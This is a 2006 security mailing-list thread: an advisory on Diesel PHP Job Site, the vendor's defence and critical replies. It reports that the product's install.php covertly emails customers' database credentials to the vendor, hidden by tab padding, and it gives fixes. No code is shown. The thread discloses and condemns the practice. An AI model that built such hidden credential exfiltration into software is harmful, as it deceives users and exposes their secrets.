Re: [Info Disclosure] Diesel PHP Job Site Latest Version
In response of the DieselScripts reaction we have contacted them and told them we should write an article about them and their way of working. They came up with the same reason why they use these phonehomeprocedure and some shocking details about the way they use it. At the end we've got them to remove the phonehomeprocedure ;) The article itself is at http://www.securityview.org/dieselscripts-or-how-a-small-company-is- making-the-errors-a-big-one-cant.html With regards, Ronald van den Blink SecurityView.org On 31 May, 2006, at 15:20, John F Flynn III wrote: As a systems administrator, I must say that your methods are unacceptable. You are violating your customers' trust by doing this without their knowledge. You even made an effort to hide the code that sends the information! This is outright deceit and should not be tolerated by anyone. Regardless of your motives, this deceitfulness must be exposed for all to know about. Perhaps you should trust your customers more. As word of this gets out, you are likely to have a lot fewer of them. I just feel sorry for those who do not find out in time and have their systems compromised because login credentials and other information were sent clear-text over the Internet. -John [EMAIL PROTECTED] wrote: Hello, To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web. All of the php developers that sell products online use this method or even more methods. Please stop making such a big deal out of this because it's our way of protecting our work and business. Thank you for understanding ! DieselScripts Staff www.dieselscripts.com -- John Flynn [EMAIL PROTECTED] = Systems and Network Administration /\_/\ School of Computer Science( O.O ) Florida International University > <
Re: [Info Disclosure] Diesel PHP Job Site Latest Version
As a systems administrator, I must say that your methods are unacceptable. You are violating your customers' trust by doing this without their knowledge. You even made an effort to hide the code that sends the information! This is outright deceit and should not be tolerated by anyone. Regardless of your motives, this deceitfulness must be exposed for all to know about. Perhaps you should trust your customers more. As word of this gets out, you are likely to have a lot fewer of them. I just feel sorry for those who do not find out in time and have their systems compromised because login credentials and other information were sent clear-text over the Internet. -John [EMAIL PROTECTED] wrote: Hello, To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web. All of the php developers that sell products online use this method or even more methods. Please stop making such a big deal out of this because it's our way of protecting our work and business. Thank you for understanding ! DieselScripts Staff www.dieselscripts.com -- John Flynn [EMAIL PROTECTED] = Systems and Network Administration /\_/\ School of Computer Science( O.O ) Florida International University > <
Re: [Info Disclosure] Diesel PHP Job Site Latest Version
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 "All of the php developers that sell products online use this method" Uh no, it doesn't work like that, sorry. If the original report is true and you were receiving the private database passwords etc of your customers then you are doing something that is negligent, deceiving, and possibly breaking some laws. I have worked for a large number of reputable software companies and their "phone home" scripts usually work like this. 1) The bit that phones home is usually encoded with something like zend accelerator or ion cube so that it is more difficult to tamper with. 2) When the script phones home it is usually with some sort of license key, and sometimes includes your domain name and other minor details. I have reviewed many proprietary code bases that use these phone home methods, and all of the ones I have seen are harmless, and justified in the data they are requesting. Never once have I seen a legitimate application use phone home methods to send database credentials. Would you please name for us one application that phones home with credential information? Kind Regards, James [EMAIL PROTECTED] wrote: > Hello, > > > > To explain this to all visitors, the information is used to prevent any > unauthorized copies from running on the web. > > > > All of the php developers that sell products online use this method or even > more methods. > > > > Please stop making such a big deal out of this because it's our way of > protecting our work and business. > > > > Thank you for understanding ! > > > > DieselScripts Staff > > www.dieselscripts.com > > -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (MingW32) iQIVAwUBRHzggNR/maLeH1kRAQpdCA//fE/SbaGU2YPYNL3iZHp2DK9zOJHi+cKV 8Ln3g0F80Sj2jeETuLm6DvijS5E4xtXU1KzNHJpgMcQLKf+yI54LJWc3MxJDQeXE 9uW995J36xb5EBfSbdceI8QGK9XQUrG1C2AfXOM0JK1EeuSGd7O9LF+k8QAGh8Bk 9Jw2n6zopfFwxP1cP12dHZPbSPCk0wdwZrokn9jplZK4QIyH9mRBYG+XnnJlXtt8 /uj+5YS9U7KKuycM4WTwCUXiRI1vkFOudmpxv7qlSg7Cpbk7Jd+Efc+MvDcDBT6e iHSb14ivFna6sv02zg8Gg9bMllRSfLkucFgfUza9G4v5XfMmBh3BHDx5ujkGXml9 ZFrVmaX5mNgFYuEFQr638ZdvAOqEtnQ+xrjiQG623rNo8NFlIPJBlhviR2qaiupt go4HoH12x1D2Msi6dmI7OHr8i9DzKhOCs9InHoGVRNq2XJTPjljywSJgV1f+VFwh y8jZzjzTi1SD3e0HMEaSiGbkYv3wEgTTuWnLzSvfYLLZ3gJMpNOmGc1gd7Y6b9wF 8w+tjVMkdow8EU1PdKv0Pacbh7Qx39yDwomW15YNgt6aKYoCQp10XsCH9U3MNSql 9pEyLItMyy3oyiYyOilPz1nAeaI1rvEAatZ4ddvQHdXa4Ly1fCKSIsEd+AEOpGxx ua+s3V3PkSQ= =yeV+ -END PGP SIGNATURE-
Re: [Info Disclosure] Diesel PHP Job Site Latest Version
Hello, To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web. All of the php developers that sell products online use this method or even more methods. Please stop making such a big deal out of this because it's our way of protecting our work and business. Thank you for understanding ! DieselScripts Staff www.dieselscripts.com
[Info Disclosure] Diesel PHP Job Site Latest Version
Subject: [Info Disclosure] Diesel PHP Job Site Latest Version Severity: Pretty Bad Title: Diesel PHP Job Site Latest Version Information Disclosure Home Page: http://www.dieselscripts.com/ Product Page: http://www.dieselscripts.com/diesel-job-site.html Date: May 17, 2006 Synopsis: = When an unsuspecting user installs this software on their webserver, all information is emailed back to the original programmers of this software. This information is sent from install.php, which includes the database host, database name, username, and password used to connect. Background: === This script allows job seekers to post their resumes and search job postings for free and employers pay a fee to post jobs and search the resumes online. Free posting and searching is also possible. Information: I run a VOIP Jobs site tailored to the Asterisk Community. As I do not have much money or investors I couldn't afford some swanky ass Job Board. I found this one, which was relatively cheap, but required register_globals. I bought it anyway (mistake #1). So, I thought I would be nice, and edit their software to remove this requirement. While I was looking through the code I found this little gem in the install file. Details: In install.php, line 31, there is a call to a mail function that emails [EMAIL PROTECTED] with your username, email, database credentials, hosts and passwords. Due to their licensing agreement I'm not actually allowed to post the offending line of code from the file. It's worth mentioning that they also tried to hide this from unsuspecting users by tabbing it across the screen a number of times so it was hidden if scrolling without wordwrap on. Sneaky bastards. Fix/Workaround: === 1. Don't use this software 2. Use it, but first comment/delete that line from install.php 3. Disable the ability to send mail from PHP/Server